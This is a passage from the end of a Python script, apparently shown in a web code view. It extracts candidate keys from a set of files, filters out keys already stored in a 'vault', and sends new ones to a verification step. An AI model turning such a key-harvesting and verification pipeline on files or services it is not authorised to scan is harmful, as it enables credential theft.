if i % 25 == 0:
|
||||
save_checkpoint()
|
||||
print(f" {i}/{len(seeds)} files, "
|
||||
f"{len(candidates)} candidates", flush=True)
|
||||
save_checkpoint()
|
||||
|
||||
# strip keys already known
|
||||
new_cand = {k: v for k, v in candidates.items() if k not in known}
|
||||
print(f"[done] {len(candidates)} total extracted, "
|
||||
f"{len(new_cand)} new (not in vault); "
|
||||
f"{stats['files_with_keys']} files yielded keys")
|
||||
write_candidates(new_cand)
|
||||
|
||||
if new_cand:
|
||||
verdicts = verify_candidates(new_cand, args.workers,
|
||||
use_cache=not args.no_cache)
|
||||
write_verdicts(verdicts)
|
||||
else:
|
||||
print("no new candidates to verify")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in new issue
Block a user